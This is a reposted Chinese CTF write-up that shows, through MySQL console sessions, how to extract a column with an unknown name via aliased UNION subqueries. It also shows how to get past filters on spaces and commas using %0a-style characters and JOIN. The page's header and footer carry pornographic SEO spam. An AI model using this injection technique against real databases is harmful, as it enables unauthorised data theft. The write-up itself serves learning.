麻豆小视频在线观看_中文黄色一级片_久久久成人精品_成片免费观看视频大全_午夜精品久久久久久久99热浪潮_成人一区二区三区四区

首頁 > 數據庫 > MySQL > 正文

Mysql如何巧妙的繞過未知字段名詳解

2024-07-24 13:13:31
字體:
來源:轉載
供稿:網友

前言

本文介紹的是DDCTF第五題,繞過未知字段名的技巧,這里拿本機來操作了下,思路很棒也很清晰,分享給大家,下面來看看詳細的介紹:

實現思路

題目過濾空格和逗號,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括號都可以繞過,逗號使用join繞過;

存放flag的字段名未知,information_schema.columns也將表名的hex過濾了,即獲取不到字段名;這時可以利用聯合查詢,過程如下:

思想就是獲取flag,讓其在已知字段名下出現;

示例代碼:

mysql/198165.html">mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;+---+---+---+---+| a | b | c | d |+---+---+---+---+| 1 | 2 | 3 | 4 |+---+---+---+---+1 row in set (0.00 sec) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;+---+---+---+---+| 1 | 2 | 3 | 4 |+---+---+---+---+| 1 | 2 | 3 | 4 |+---+---+---+---+1 row in set (0.00 sec) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;+---+-------+----------+-------------+| 1 | 2  | 3  | 4   |+---+-------+----------+-------------+| 1 | 2  | 3  | 4   || 1 | admin | admin888 | [email protected] || 2 | test | test123 | [email protected] || 3 | cs | cs123 | [email protected] |+---+-------+----------+-------------+4 rows in set (0.01 sec) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;+-------------+| 4   |+-------------+| 4   || [email protected] || [email protected] || [email protected] |+-------------+4 rows in set (0.03 sec) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3; +-------------+| 4   |+-------------+| [email protected] |+-------------+1 row in set (0.01 sec) mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)dunion select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;+-------------+----------+----------+-------------+| id   | username | password | email  |+-------------+----------+----------+-------------+| 1   | admin | admin888 | [email protected] || [email protected] | 1  | 1  | 1   |+-------------+----------+----------+-------------+2 rows in set (0.04 sec)

總結

以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作能帶來一定的幫助,如果有疑問大家可以留言交流,謝謝大家對VeVb武林網的支持。

 

注:相關教程知識閱讀請移步到MYSQL教程頻道。
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 日韩视频一区二区三区在线观看 | 精品亚洲va在线va天堂资源站 | 成人毛片免费看 | 免费a视频 | 久久亚洲精品国产一区 | 成人视屏在线观看 | 福利一区二区三区视频在线观看 | 欧美亚州 | 久久久久久久久久亚洲精品 | 日韩黄色影视 | 中文字幕欧美视频 | 亚洲国产精品二区 | 中文字幕综合在线观看 | 国产成人高潮免费观看精品 | 羞羞视频.www在线观看 | 精品二区在线观看 | chinesexxx少妇露脸 | 高清国产福利 | 在线播放免费播放av片 | 欧美激情精品久久久久久久久久 | 久久久av亚洲男天堂 | 欧美高清一级片 | 久久亚洲国产精品 | 免费网站看毛片 | 中文字幕在线亚洲精品 | 曰批全过程120分钟免费69 | 午夜爱爱福利 | avav在线播放 | 黄色片网站在线免费观看 | 一级大片一级一大片 | 久久免费视频一区 | bt 自拍 另类 综合 欧美 | 免费观看高清视频网站 | 欧美黄色一级片在线观看 | 国产免费人做人爱午夜视频 | av成人在线免费观看 | 欧美一级视屏 | 欧美 日本 在线 | 91成人久久 | 亚洲午夜在线 | 久久久久久久久久久久久久av |